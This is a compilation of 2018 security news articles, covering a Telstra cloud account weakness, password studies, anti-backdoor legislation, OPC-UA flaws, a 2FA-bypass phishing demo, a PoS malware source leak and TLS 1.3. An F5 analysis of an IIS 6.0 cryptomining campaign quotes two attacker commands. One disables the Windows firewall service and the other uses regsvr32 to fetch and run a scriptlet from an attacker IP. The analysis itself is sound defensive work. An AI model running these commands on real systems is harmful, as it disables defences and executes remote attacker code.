STE WILLIAMS

Telstra tells cloud customers they’re at risk of malware or worse

UPDATE Telstra has advised users of its cloud who run self-managed resources that their “internet facing servers are potentially vulnerable to malware or other malicious activity.”

The company says that it spotted a weakness in its service on May 4th and is now telling users to “delete or disable” the “TOPS or TIRC account on your self-managed servers”.

The Register has asked Telstra what “TOPS” and “TIRC” accounts allow. But the note sent to customers suggests they’re privileged administrator accounts of some sort.

“We’ve also taken steps to access your account and remove the TOPS or TIRC accounts to minimise the risk on your behalf,” the note says. “We’re still encouraging you to check your account settings and remove/disable any unused accounts as we can’t confirm at this stage if we’ll be successful updating the accounts from our end.”

The letter was sent to users of self-managed servers and advises customers of Telstra-managed servers that they’re in the clear.

At a guess, this sounds like TOPS and TIRC accounts have standard passwords, which have become more widely known than is sensible. And because such accounts appear to be on by default, it is party time for any miscreants who have credentials to unlock them.

And whatever the opposite of party time is at Telstra cloud.

We’ve asked Telstra to detail the situation and will update this story if it offers pertinent information. ®

UPDATE: A Telstra spokesperson told us “Our customers’ security is our number one priority. We identified a weakness, moved quickly to address it and worked closely with our customers to ensure the necessary steps were taken to fully secure their systems.” The spokesperson did not elaborate on the nature of the security SNAFU.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/11/telstra_self_managed_cloud_security_incident/

Bombshell discovery: When it comes to passwords, the smarter students have it figured

Students who get good grades have better passwords than their less academically successful peers, though this finding should be considered alongside several caveats.

JV Roig, consulting director and software developer at Asia Pacific College (APC) in the Philippines, wanted to find out whether school smarts had any bearing on password quality.

So he compared security researcher Troy Hunt’s Have I Been Pwned? data, a list of 320 million exposed password hashes, with password hashes from APC’s 1,252 students.

It turns out that 215 of the student password hashes had a match in Hunt’s database. This indicates that they were using unsafe passwords that had been compromised at some point in time over the past few years.

Roig then grouped the students by GPA to determine whether those with higher GPAs would have fewer compromised passwords.

And indeed, there was some correlation.

password

Password re-use is dangerous, right? So what about stopping it with password-sharing?

READ MORE

“…If we only take into account students with a GPA of at least 3.5, only 12.82 per cent of them use compromised passwords, which compares favorably to the population average of 17.17 per cent,” Roig wrote in a research paper posted to ArXiv on Wednesday. “Looking at students with a minimum GPA of 3.0 results in 15.29 per cent compromised passwords, which is significantly closer to the population average.”

Roig concludes that the academically inclined do seem to have better passwords than peers who don’t score as well in school.

But he cautions that GPA isn’t necessarily a measure of intelligence, that a password can be absent from Hunt’s dataset and still be weak and that the sample population used for this study may be too small to conclude anything and may be biased in some way.

“This shouldn’t be taken as the end-all or be-all of whether smarter people have better passwords, but merely one interesting data point in what could be an interesting series of further experiments,” he said. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/smart_people_passwords/

New law would stop feds from demanding encryption backdoor

US lawmakers from both major political parties came together on Thursday to reintroduce a bill that, if passed, would prohibit the US government from forcing tech product makers to undermine the security of their wares.

The bill, known as the Secure Data Act of 2018, was returned to the US House of Representatives by Representative Zoe Lofgren (D-CA) and Thomas Massie (R-KY), with the support of Jerrold Nadler (D-NY), Ted Poe (R-TX), Ted Lieu (D-CA) and Matt Gaetz (R-FL), cosponsors of a past failed version of the bill from 2014 and a similarly ill-fated 2015 successor.

In the US Senate in 2014 and 2015, Sen. Ron Wyden (D-OR) sponsored parallel versions of the bill; a Senate equivalent has yet to be floated for this legislative term.

America

WHY can’t Silicon Valley create breakable non-breakable encryption, cry US politicians

READ MORE

The Secure Data Act forbids any government agency from demanding that “a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.”

It also prohibits courts from issuing orders to compel access to data.

Covered products include computer hardware, software, or electronic devices made available to the public.

The bill makes an exception for telecom companies, which under the 1994 Communications Assistance for Law Enforcement Act (CALEA) would still have to help law enforcement agencies access their communication networks.

Though not specifically mentioned in the legislative text, this is a bill to protect the integrity of encryption systems.

After the FBI in 2015 faced delays accessing the iPhone used by mass shooter Syed Rizwan Farook, law enforcement officials became more vocal about concerns that encryption can leave investigators in the dark.

Though authorities fought and lost this battle in the early 1990s when they tried to mandate adoption of a backdoored chip, the Clipper Chip, they’ve not conceded. The argument also came up after the September 11 atrocity but was shot down on practical grounds.

But for the last few years the FBI has been pushing for backdoors again. Last month Ray Ozzie, designer of Lotus Notes and the former CTO of Microsoft, proposed a similar key escrow scheme, reviving hope among backdoor supporters that security and insecurity can safely coexist. Ozzie’s ideas have been panned by experts

In a speech on Monday, Attorney General Jeff Sessions said, it is “critical that we deal with the growing encryption or the ‘going dark’ problem.”

Thus backdoor skeptics have returned to do battle again.

“Encryption backdoors put the privacy and security of everyone using these compromised products at risk,” said Lofgren in a statement.

“It is troubling that law enforcement agencies appear to be more interested in compelling US companies to weaken their product security than using already available technological solutions to gain access to encrypted devices and services.”

Lofgren argues that encryption backdoors represent a demonstrated security risk and that they harm US companies and jobs by making American tech products less secure and thus less competitive on the global market. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/proposed_law_would_stop_feds_from_demanding_backdoors/

17 Zero-Days Found & Fixed in OPC-UA Industrial Protocol Implementations

Vulnerabilities in the framework used for secure data transfer in industrial systems were all fixed by March, says Kaspersky Lab.

Researchers discovered 17 zero-day vulnerabilities in a popular framework for secure data transfer between clients and servers in industrial systems — OPC-UA — and applications that use that framework.

OPC-UA (Object Linking and Embedding for Process Control Unified Automation) is an updated, more-secure version of the OPC protocol, and allows the use of SOAP over HTTPS.

However, Kaspersky Lab ICS CERT released findings today that many implementations of OPC-UA had code design flaws that left them open to denial-of-service and remote code execution attacks. Vulnerabilities were found both in the OPC Foundation’s own applications as well as third-party applications that use the OPC-UA Stack.

All vulnerabilities were reported to developers, and were fixed as of March, according to Kaspersky Lab. See the full report here.

 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/17-zero-days-found-and-fixed-in-opc-ua-industrial-protocol-implementations/d/d-id/1331775?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Phishing Attack Bypasses Two-Factor Authentication

Hacker Kevin Mitnick demonstrates a phishing attack designed to abuse multi-factor authentication and take over targets’ accounts.

Businesses and consumers around the world are encouraged to adopt two-factor authentication as a means of strengthening login security. But 2FA isn’t ironclad: attackers are finding ways to circumvent the common best practice. In this case, they use social engineering.

A new exploit, demonstrated by KnowBe4 chief hacking officer Kevin Mitnick, lets threat actors access target accounts with a phishing attack. The tool to do this was originally developed by white hat hacker Kuba Gretzky, who dubbed it evilginx and explains it in a technical blog post.

It starts with typosquatting, a practice in which hackers create malicious URLs designed to look similar to websites people know. Mitnick starts his demo by opening a fake email from LinkedIn and points out its origin is “llnked.com” – a misspelling people will likely overlook.

Those who fall for the trick and click the email’s malicious link are redirected to a login page where they enter their username, password, and eventually an authentication code sent to their mobile device. Meanwhile, the attacker can see a separate window where the victim’s username, password, and a different six-digit code are displayed.

“This is not the actual 6-digit code that was intercepted, because you can’t use the 6-digit code again,” Mitnick says in the demo. “What we were able to do was intercept the session cookie.”

With the session cookie, an attacker doesn’t need a username, password, or second-factor code to access your account. They can simply enter the session key into the browser and act as you. All they have to do is paste the stolen session cookie into Developer Tools and hit Refresh.

It’s not the first time 2FA has been hacked, says Stu Sjouwerman, founder and CEO at KnowBe4. “There are at least ten different ways to bypass two-factor authentication,” he explains in an interview with Dark Reading. “They’ve been known about but they aren’t necessarily well-published … most of them are flying under the radar.”

These types of exploits are usually presented as concepts at conferences like Black Hat. Mitnick’s demo puts code into context so people can see how it works. This can be used for any website but an attacker will need to tweak the code depending on how they want to use it.

To show how the exploit can make any site malicious, Sjouwerman sent me an email tailored to look like it came from Kelly Jackson Higgins, reporting a typo in an article of mine:

When I clicked the link, I ultimately ended up on Dark Reading but was first redirected to a site owned by the “attacker” (Sjouwerman). In a real attack scenario, I could have ended up on a truly malicious webpage where the hacker could launch several different attacks and attempt to take over my machine. Sjouwerman sent a screenshot of what he saw while this happened:

Event types go from processed, to deferred, to delivered, to opened.

“You need to be a fairly well-versed hacker to do this – to get it set up and have the code actually working,” he notes. This is a one-on-one attack and can’t be scaled to hit a large group of people at the same time. However, once the code works, the attack is fairly simply to pull off.

“You need to have user education and training, that’s a no-brainer, but you also have to conduct simulated phishing attacks,” Mitnick says in his demo.

Sjouwerman emphasizes the importance of putting employees through “new school” security awareness training, as opposed to the “death by PowerPoint” that many employees associate with this type of education. Instead of putting them through presentations, he recommends sending them phishing attacks and conducting online training in the browser.

Related Content:

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/endpoint/phishing-attack-bypasses-two-factor-authentication/d/d-id/1331776?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Author of TreasureHunter PoS Malware Releases Its Source Code

Leak gives threat actors a way to build newer, nastier versions of the point-of-sale malware, Flashpoint says.

In a development that could spell trouble for point-of-sale (PoS) operators, the author of TreasureHunter, a point-of-sale malware family that has been circulating in the wild since at least 2014, has released source code for the malware.

Along with it, the threat actor has also released code for TreasureHunter’s graphical user interface builder and the malware’s administrator panel, security vendor Flashpoint said in an advisory this week.

The code release, in a leading Russian underground forum, has given security researchers fresh insight into the malware, which they have had to reverse engineer up to this point in order to analyze.  

Vitali Kremez, director of research at Flashpoint, says the code has provided some unique insight into the coders’ mindset and operational style. Flashpoint, in collaboration with security researchers from Cisco Talos, has already been able to use the leaked code to improve protections around the malware and to be able to quickly disrupt potential copycat versions of it.

At the same time, the open availability of TreasureHunter code in a popular underground forum lowers the bar for other threat actors to build new and potentially more sophisticated versions of the PoS malware, Kremez says.

“Based on our intelligence, this malware was linked to quite a few breaches [perpetrated by] Russian-speaking criminal groups targeting small-sized and medium-sized retailers,” Kremez says. But the full source code was up to now reserved for BearsInc, a notorious Russian-speaking group that specializes in selling stolen card data via low-tier and midtier hacking and carding communities.

Flashpoint says its researchers have already observed Russian-speaking threat actors discussing ways to improve and weaponize TreasureHunter in new ways. How exactly malware authors will use the code to improve TreasureHunter remains unclear. “Likely, cybercriminals would work on improving [the malware’s] communication protocol” and adding more functionality to it, Kremez says.

The leaked code shows that the original author planned to tweak various features of the malware, including its anti-debugging capabilities and communication logic. The code also contains a long list of “to-do” items and suggestions for improving the overall functionality of TreasureHunter.

What is not clear at the moment is why exactly the Russian-speaking author of the malware decided to leak its source code publicly. “We hypothesize it is likely they did this in [an] attempt to distance themselves from being unique malware code owners,” says Kremez. Often, threat actors resort to the tactic to frustrate efforts by law enforcement investigators and security researchers to attribute attacks and malware to specific threat actors and groups.

For instance, in September 2016, the three authors of Mirai — one of whom was a former Rutgers University student — decided to publicly release its source code after infecting hundreds of thousands of Internet of Things devices worldwide with the malware. Prosecutors described the leak as an attempt by the trio to cover their tracks and to build plausible deniability of their direct connection to the malware.

Threat actors later took advantage of the leaked Mirai code to build multiple versions of the malware, including one that was responsible for disrupting services at DNS provider Dyn and numerous other major Internet companies.

A similar leak of the Zeus banking Trojan code back in 2011 resulted in multiple more-dangerous versions of the malware becoming available soon after. “PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware, which led to the creation of the ProPoS and Katrina variants,” Kremez wrote in the Flashpoint blog post announcing the code leak this week.

Related Content:

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/author-of-treasurehunter-pos-malware-releases-its-source-code-/d/d-id/1331778?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Electroneum Cryptomining Targets Microsoft IIS 6.0 Vulnerability

What’s This?

New campaign shows that there are still systems exposed to the year-old CVE-2017-7269 vuln on an operating system that was declared end-of-life three years ago.

F5 researchers recently noticed a new campaign exploiting a year-old vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers  to mine Electroneum cryptocurrency using the same IIS vulnerability (CVE–2017–7269) reported last year by ESET security researchers to have been abused to mine Monero and launch targeted attacks against organizations by the notorious “Lazarus” group. Lazarus group is widely believed to be North Korean government hackers.

This latest campaign shows that there are still systems vulnerable to this year-old vulnerability on an operating system that was declared end-of-life (EoL) three years ago.  More recently, for example,in March 2017, it was publicly disclosed that Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a new buffer overflow vulnerability in its WebDAV functionality. On successful exploitation, it is possible to remotely execute code. Upon release, it was reported that the vulnerability was already being exploited in the wild. Within two days, a Proof-of-Concept (POC) exploit was published.

Shellcode Analysis

The exploit in this campaign is identical to the original Proof-of-Concept (POC) exploit published in March 2017 but it embeds a different shellcode to execute attacker’s commands. The shellcode itself is an ASCII shellcode which contains a Return-Oriented Programming (ROP) chain. ASCII shellcode is machine code that consists entirely of alphanumeric ASCII or unicode characters, which allows an attacker to bypass input restrictions. The ROP exploitation technique composes shellcode from instructions already loaded into memory called “gadgets,” instead of writing and executing additional external code into memory. This allows attackers to bypass security mechanisms such as executable space protection and code signing.

The execution of this shellcode results in opening a reverse shell to a malicious remote server. A reverse shell is a type of shell in which the target machine communicates back to attacker’s remote machine and waits for the attacker to send shell commands.

Once the compromised server is connected to the attacker’s remote machine, it will automatically receive and execute two commands.

Image Source: F5

First Command

CD /d %WinDir%Temp Net Stop SharedAccess /Y

This command stops the “Internet Connection Firewall (ICF)” service, which if present, may block outgoing communication from the compromised machine.

Second Command

TaskKill /IM RegSvr32.exe /f Start RegSvr32.exe /s /n /u /i:http://117.79.132.174/images/test.sct scrobj.dll

Here, the attacker is using a technique named “Squiblydoo” to bypass software whitelisting protection by executing attacker commands with a legitimate Microsoft binary. It allows the attacker to fetch and execute a remote Extensible Markup Language (XML) file that contains “scriptlets” with attacker’s code of choice, using a legitimate and signed “regsvr32” Windows binary. This binary is proxy aware, uses Transport Layer Security (TLS) encryption, and follows redirects.

Executing the Scriptlets

The downloaded XML file named “test.sct” contains VBscript scriptlets that hold attacker’s commands. The Microsoft Visual Basic Scripting (VBScript) still had attacker comments embedded.

Updating the Malware

If the attacker compromised the server previously, the script will stop and replace the old binary file with a new one before execution. The script tries to terminate a process of a specific file named “lsass.eXe” that is located in Windows OS folder under the path of “/System32/Temp.”

The name “lsass.eXe” was chosen to mask the malicious file as a legitimate “lsass” process, a critical part of Windows.  To make sure that the process terminates before the script tries to delete the file, the attacker uses the “ping” command to delay script execution. Our assumption is that the attacker chose the “ping” command over the “sleep” command because it is less suspicious. The “sleep” command appears to be commented out.

After performing these commands, the script creates a new file in the same location with the same name using the binary data from the Base64 string and executes it.

Getting Persistence as RPC Service

The script tries to register the execution command as an “RpcRemote” service to launch itself upon every system startup, which will grant persistence on the target. The name “RpcRemote” was chosen to make it look like a legitimate component of the operation system.

Mining Electroneum

By looking at the command line executed by the script, we assume that the executable file is a crypto-currency miner. The clues are to be found in the “-p” and “-u” arguments, “stratum+tcp://” address, as well as the long wallet address starting with the “etn” letters, implying Electroneum (ETN) crypto-coin. The file itself is a 32bit version of a crypto-currency miner called XMRig (2.5.2) that was packed using the “Ultimate Packer for Executables” (UPX) packer.

The execution command instructs the miner to mine the Electroneum crypto-currency using several pools simultaneously to this wallet:

etnjzC1mw32gSBsjuYgwWKH5fZH6ca45MDxi6UwQQ9C8GJErY3rVrqJA8sDtPKMJXsPuv4vdSyDzGVTVqgAh97GT8smQMoUaQn

At the time of writing, the attacker has earned roughly $99 from the campaign across booth pools. This is a very small amount of money earned, given how lucrative most other crypto-mining campaigns are currently, making this campaign appear unsuccessful. One theory is that the attacker will change the wallet address from time to time. Another theory is that there aren’t many IIS 6.0 servers available to exploit left.

But although these attackers haven’t made much money on this campaign yet, we encourage businesses to abandon the use of EOL software in every instance possible. When that’s not feasible, we recommend patching any critical vulnerability immediately upon release of the patch. If patching is not possible, there are many compensating controls that can be implemented depending on your security control framework such as blocking attacks with a Web Application Firewall (WAF), or not allowing vulnerable legacy systems to touch the internet.

For more details, click here.

Get the latest application threat intelligence from F5 Labs.

F5 makes apps go-faster, smarter, and safer. With solutions for the cloud and the data center, F5 technology provides unparalleled visibility and control, allowing customers to secure their users, applications, and data. For more information, visit www.f5.com. View Full Bio

Article source: https://www.darkreading.com/partner-perspectives/f5/electroneum-cryptomining-targets-microsoft-iis-60-vulnerability-/a/d-id/1331752?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Ready or Not: Transport Layer Security 1.3 Is Coming

Better encryption could mean weaker security if you’re not careful.

Transport Layer Security (TLS) protocols enable secure network communications and support everything from e-commerce to email. TLS 1.3 — the latest update to the ubiquitous SSL/TLS encryption protocol — is in the final stages of ratification and will become official soon. This new encryption standard will offer substantial security and performance benefits. The question for security teams is — are you ready?

Rest assured, the day TLS 1.3 is official won’t be a “Y2K bug” moment for encrypted traffic — and for everyday Web users, the update will likely go unnoticed. However, for security teams, the time to prepare for the new standard is now.

The Internet Engineering Task Force (IETF), which governs the standard, recently announced approval of the 28thdraft of TLS 1.3, and many in the Internet ecosystem will likely be aggressive in rolling it out. However, adoption will vary by geography, industry, and business model. For example, industries that rely on high Web traffic, such as online retailers and news sites, may be slower to adopt the new standard because they don’t want to turn away site visitors using unsupported browsers. Other companies, especially those in highly regulated industries, may insist on a higher level of security protection when employees interact with external sites, send email, or transfer files.

The high-security encryption gained from TLS 1.3 comes at a critical time because the challenges of cyber defense have never been greater. Malicious actors continually look for new ways to carry out attacks, and they’re well aware that encryption affords an easy path to avoid protective measures. Consequently, Gartner predicts that in 2019 “more than 50% of new malware campaigns will use various forms of encryption to conceal delivery and ongoing communications, including data exfiltration.” 

Determining TLS 1.3 Readiness
Organizations should always aspire to achieve the best possible security posture, as long as no other risks are introduced. And although TLS 1.3 will offer substantial security benefits, there are factors to consider before adopting the standard. In fact, many organizations have existing network security architectures in place that are fine-tuned to deal with the world as it is, and changing the strength of encryption can create challenges.

Having highly secure sessions without compromising the protection offered by existing network security tools is tricky because encryption hides the traffic it is designed to inspect; encrypted traffic, whether it is private data or malware, is all hidden from most standard security systems. A straightforward and effective way to avoid being blinded to malicious traffic is with an encrypted traffic management application that physically (or virtually) resides within the network and facilitates a view of decrypted traffic to a wide variety of security tools. However, what many have found is that the security solutions that allow SSL visibility and enable security inspection vary greatly in their ability to provide visibility while simultaneously maintaining the privacy and security integrity of the session.

When a client-server session is established with an encrypted traffic management application residing in the middle, all parties must work in harmony for seamless connectivity. When a tool in the middle cannot support the high-level encryption preferences of the client and server, one of three choices must be made:

1. Block the traffic, which leads to a poor user experience;

2. Allow the encrypted traffic without inspection, which results in a decreased security posture (cipher)

3. Degrade the session to a lower security connection that is supported by both client and server. For example, changing the session to an earlier version (TLS 1.2 or TLS 1.1) or dropping from a strong cipher suite (such as one that provides perfect forward secrecy) to a weaker one.

For practical reasons, degrading session security is the choice most enterprises make, affording a positive user experience with some inspection capability. However, it is still a compromise because it means sacrificing encryption strength in exchange for increased visibility for inspection tools. Ideally, choices like this should not have to be made.

Taking the Right Steps
To best prepare for TLS 1.3, security teams must inspect their current approach and determine how change will affect it. Here are some questions to consider:

  • Is decrypted traffic currently being inspected?
  • Will changes in the new standard affect the performance of that inspection or add pressure to the network?
  • Will we need to re-architect to accommodate the new standard?

Companies with network security tools in place (intrusion-prevention systems, next-gen firewall, sandboxes, forensics, etc.) that are not inspecting traffic should conduct a risk assessment and develop a plan to create secure and compliant inspection of potential hidden threats. It’s also important to engage cross-functional partners early (including network, security, and compliance teams) to be sure that the plan addresses any encryption blind spots. 

Those with inspection capability in place should determine if the current solution meets requirements for secure decryption for earlier SSL/TLS protocols. Organizations will need to inspect less-secure traffic (e.g., TLS 1.2), and it’s important they do so without introducing new security risks. A thorough assessment should help them determine if their inspection solution has strong ciphers and mirror client ciphers, validates certificates, and demonstrates protection against known vulnerabilities.

Finally, organizations should determine if it’s possible to enable inspection while preserving the strong security benefits of TLS 1.3. An inspection solution will need to support a new handshake mechanism and must support the limited number of cipher suites required for TLS 1.3. These ciphers are much stronger and offer greater protection against replay attacks. To fully enjoy these benefits, a full handshake must be enabled.

By taking these steps, your organization can help get ready for when TLS 1.3 arrives and avoid having to make trade-offs involving user experience, encryption strength, and inspection capabilities.

Related Content:

In his role as vice president of product strategy and operations, Mark helps major enterprises navigate the evolving technology landscape to address key business and security issues. Mark joined Symantec via the Blue Coat acquisition, where he led product strategy … View Full Bio

Article source: https://www.darkreading.com/endpoint/ready-or-not-transport-layer-security-13-is-coming/a/d-id/1331753?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

As Personal Encryption Rises, So Do Backdoor Concerns

Geopolitical changes drive personal encryption among security pros, who are increasingly worried about encryption backdoors.

More security pros are embracing personal encryption in response to recent political changes, according to a new Venafi report. At the same time, they’re increasingly wary of encryption backdoors as attackers become more sophisticated.

Researchers collected their data at the 2018 RSA Conference, where they polled more than 500 attendees on their response to geopolitical changes. Sixty-four percent of respondents said their personal encryption usage had increased as a result, compared with 45% at RSAC 2017.

Results also indicated a growing wariness of encryption backdoors. The majority (84%) of participants are more worried about backdoors in 2018, compared with 73% who expressed this concern last year. Over the past 12 months, the report notes, there have been many comments and legislative suggestions proposing mandated encryption backdoors.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/as-personal-encryption-rises-so-do-backdoor-concerns/d/d-id/1331773?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Risky Business: Deconstructing Ray Ozzie’s Encryption Backdoor

With the addition of secure enclaves, secure boot, and related features of “Clear,” the only ones that will be able to test this code are Apple, well-resourced nations, and vendors who sell jailbreaks.

Recently, Ray Ozzie proposed a system for a backdoor into phones that he claims is secure. He’s dangerously wrong.

According to Wired, the goal of Ozzie’s design, dubbed “Clear,” is to “give law enforcement access to encrypted data without significantly increasing security risks for the billions of people who use encrypted devices.” His proposal increases risk to computer users everywhere, even without it being implemented. Were it implemented, it would add substantially more risk.

The reason it increases risk before implementation is because there are a limited number of people who perform deep crypto or systems analysis, and several of us are writing about Ozzie’s bad idea rather than doing other, more useful work.

We’ll set aside, for a moment, the cybersecurity talent gap and look at the actual plan. The way a phone stores your keys today looks something like the very simplified Figure 1. There’s a secure enclave inside your phone. It talks to the kernel, providing it with key storage. Importantly, the dashed lines in this figure are trust boundaries, where the designers enforce security rules.

Source: Adam Shostak

What the Clear proposal does is that when you generate a passphrase, an encrypted copy of that passphrase is stored in a new storage enclave. Let’s call that the police enclave. The code that accepts passphrase changes gets a new set of modules to store that passphrase in the police enclave. (Figure 2 shows added components in orange.) Now, that code, already complex to manage Face ID, Touch ID, corporate rules about passphrases, and perhaps other things, has to add additional calls to a new module, and we have to do that securely. We’ll come back to how risky that is. But right now, I want to mention a set of bugs, lock screen vulnerabilities, and issues, not to criticize Apple, but to point out that this code is hard to get right, even before we multiply the complexity involved.

There’s also a new police user interface on the device, which allows you to enter a different passphrase of some form. The passcode validation functions also get more complex. There’s a new lockdown module, which, realistically, is going to be accessible from your lock screen. If it’s not accessible from the lock screen, then someone can remote wipe the phone. So, entering a passcode, shared with a few million police, secret police, border police, and bloggers around the globe will irrevocably brick your phone. I guess if that’s a concern, you can just cooperatively unlock it.

Source: Adam Shoshtak

Lastly, there’s a new set of off-device communications that must be secured. These communications are complex, involving new network protocols with new communications partners, linked by design to be able to access some very sensitive keys, implemented in all-new code. It also involves setting up relationships with, likely, all 193 countries in the United Nations, possibly save the few where US companies can’t operate. There are no rules against someone bringing an iPhone to one of those countries, and so cellphone manufacturers may need special dispensation to do business with each one.

Apple has been criticized for removing apps from the App Store in China, and that may be a precedent that Apple’s “evaluate” routine may be different from country to country, making that code more complex.

The Trusted Computing Base
There’s an important concept, now nearly 40 years old, of a trusted computing base, or TCB. The idea is that all code has bugs, and bugs in security systems lead to security consequences. A single duplicated line of code (“goto fail;“) led to failures of SSL, and that was in highly reviewed code. Therefore, we should limit the size and complexity of the TCB to allow us to analyze, test, and audit it. Back in the day, the trusted kernels were on the order of thousands of lines of code, which was too large to audit effectively. My estimate is that the code to implement this proposal would add at least that much code, probably much more, to the TCB of a phone.

Worse, the addition of secure enclaves, secure boot, and related features make it hard to test this code. The only people who’ll be able to do so are first, Apple; second, well-resourced nations; and third, vendors that sell jailbreaks. So, bugs are less likely to be found. Those that exist will live longer because no one who can audit the code (except Apple) will ever collaborate to get the bugs fixed. The code will be complex and require deep skill to analyze.

Bottom line: This proposal, like all backdoor proposals, involves a dramatically larger and more complex trusted computing base. Bugs in the TCB are security bugs, and it’s already hard enough to get the code right. And this goes back to the unavoidable risk of proposals like these. Doing the threat modeling and security analysis is very, very hard. There’s a small set of people who can do it. When adding to the existing workload of analyzing the Wi-Fi stack, the Bluetooth stack, the Web stack, the sandbox, the app store, each element we add distributes the analysis work over a larger volume of attack surface. The effect of the distribution is not linear. Each component to review involves ramp-up time, familiarization, and analysis, and so the more components we add, the worse the security of each will be.

This analysis, fundamentally, is independent of the crypto. There is no magic crypto implementation that works without code. Securing code is hard. Ignoring that is dangerous. Can we please stop?

Adam is an entrepreneur, technologist, author and game designer. He’s a member of the BlackHat Review Board, and helped found the CVE and many other things. He’s currently building his fifth startup, focused on improving security effectiveness, and mentors startups as a … View Full Bio

Article source: https://www.darkreading.com/endpoint/risky-business-deconstructing-ray-ozzies-encryption-backdoor/a/d-id/1331743?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple